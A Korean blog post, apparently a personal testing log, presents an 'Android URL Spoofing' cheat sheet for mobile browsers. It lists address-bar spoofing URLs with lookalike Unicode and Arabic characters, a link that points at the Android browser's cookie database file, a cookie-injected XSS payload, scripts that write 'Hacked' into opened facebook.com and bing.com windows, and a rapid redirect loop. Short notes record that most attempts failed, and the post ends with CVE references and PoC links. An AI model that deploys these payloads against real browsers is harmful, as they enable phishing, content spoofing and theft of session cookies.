Android URL Spoofing cheat sheet
http://182.176.65.7/%EF%B9%B0/http://google.com/test.
<a href='file:///data/data/com.android.browser/databases/webviewCookiesChromium.db '>
Redirecting... To continue, tap and hold here, then choose "Open in a new tab"
</a>
<script>
document.cookie='x=<img src=x onerror=prompt(document.body.innerHTML)>';
</script>
안됨. 그냥 클릭누르면 아무 것도 하지 않음
puffin web browser
<script>
w = window.open(‘http://www.facebook.com’);
w.document.write(‘<html>Hacked</html>’)
w.focus();
</script>
스크립트 실행 자체가 안됨.
ㅣ
<script>
w = window.open("https://www.bing.com", "_blank");
setTimeout(function() {
w.document.write("<html>hacked</html>")
},5000);
</script>
스크립트 실행이 안됨.
<script>
alert(1337)
function spoof() {
location="http://www.dailymail.co.uk/home/index.html?random="+Math.random();
} setInterval("spoof()",10);
</script>
"중지하는 중.." 이라는 말만 뜨고 다른 건 없다. 근데 계속 www.dailymail.co.uk 로 이동하려고 하긴 한다. 계속 왔다리갔다리 하다가 결국에는 이동하긴 한다. 이것이 url spoofing 취약점인가ㅏ...?
<a onclick="test()">CLICK</a>
<script>
function test() {
window.open('http://bing.com/') setTimeout(function() {
alert("HACKED");
}, 5000)
}
</script>
CLICK 버튼이 눌리지 않는다.
아랍어를 이용해서 URL Spoofing
http://www.securityweek.com/address-bar-spoofing-vulnerability-found-several-browsers
CVE-2016-5267로 등록되었다고 한다.
http://127.0.0.1/|/http://example.com.
http://example.com/|/127.0.0.1.
이 URL이 http://example.com/|/127.0.0.1 처럼 되는지 확인해보자
이게 아랍어를 이용해서 Hacking하는 것이라고 한다.
http://عربي.امارات/google.com/test/test/test
CVE-2016-5268 를 이용한 Payload
http://me6.com/mozilla/poc1.html
http://me6.com/mozilla/poc2.html
'Hacking > App.' 카테고리의 다른 글
CTF Python Jail tips - 3 (0) | 2018.02.18 |
---|---|
CTF Python Jail tips 2 (1) | 2018.02.16 |
CTF Python Jail Tips (0) | 2018.02.08 |
System overall (0) | 2018.01.05 |
JEB 초기 사용법 (0) | 2017.09.28 |